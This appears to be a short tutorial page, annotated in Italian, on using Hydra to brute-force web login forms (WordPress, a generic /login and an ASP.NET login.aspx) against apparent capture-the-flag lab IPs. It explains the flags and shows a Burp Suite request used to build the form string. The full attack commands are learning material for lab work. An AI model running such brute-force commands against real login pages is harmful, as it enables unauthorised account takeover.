Tutorials

Hydra Bruteforce

shell hydra -l Elliot -P fsocity.dic 10.10.43.184 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:F=The password you entered for the username" -t 30 -V -I

#exploitation#password-cracking

shell
hydra -l Elliot -P fsocity.dic 10.10.43.184 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:F=The password you entered for the username" -t 30 -V -I
-l = il nome utente usato per il login

-P = wordlist con le password usata per il login

10.10.43.184 = ip da attaccare

http-post-form = servizio da attaccare

/wp-login.php:log=^USER^&pwd=^PWD^ = posizione del form con il login e relativi parametri

:The password you entered for the username = ciò che fa capire ad hydra che la password è sbagliata

-t = richieste al secondo

-V = mostrare tutti i tentativi di login anche quelli errati

-I = skippare i primi 10 secondi di wait

shell
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.153.229 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -t 30

shell
eg: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.166.221 http-post-form "/Account/login.aspx:__VIEWSTATE=J7%2FrKT%2FRbzXElHvOFArr4HX0BUp05PUs%2Bjl4fN5QtFnsigr6tjwFZkWaUW9RaCNkl5wcaaA9I71WXBKsdywllsO45a8kdE%2BO2GeciLswYLZgMhEIYMOLKvVE1g9%2FuxmOjygsPrfW43YX1axgD3V%2FmbHd2lx7jcwje7Qgkp065G2LekTQ&__EVENTVALIDATION=nIJxL4rdGJE3KYMzFDmVH35CAPYLfmVh68KpFWCfpmOAp8i4dLgnYkYLVP3UEDV8IiIqX6kXoIwujnQvd7xTK1Tbiqg5RF0fYL3q6nazJk37P%2BrLs8lq043TvaeMwGi4uqTkx2onf8prQt9NNxgtS4oXE0haNUx6xQId8O8kqlZfYRAG&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed"

BURPSUITE:

POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1

Host: 10.10.166.221

Content-Length: 549

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.10.166.221

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://10.10.166.221/Account/login.aspx?ReturnURL=%2fadmin%2f

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

__VIEWSTATE=6Ma35580Jr1hvNBh%2BmZQaBkj9gB85uHBXRdWlCwHrlzgqykyUDBcigH7jjhYhm3CeyFTcMxkgBaFBtffzW4ikD24tLI5CeXycn2T%2FTX3sVADzzUh53ljcOmAXRdzIeHUdJ5mSzBsXNe2jmrFFyUARorA1YxlsxOK%2BAqNtIKo%2BtKtpSXC&__EVENTVALIDATION=o5BKiXhvkrdSDndyC7ko%2BXtBP5%2FgEffYcZTxXYsLHl0wvYhFcxqBYNqoMiPbGcMFfmPNX6mMFS7wXpVzJg0bjs448JGYBzVa38ID%2FALfM4AZLK8EnWKnu53wWbxtiaEiN%2BI16I0xZrSLSwgx99nYKqHBF7MDe1VrOQHvGxQgXEsVildK&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=test&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in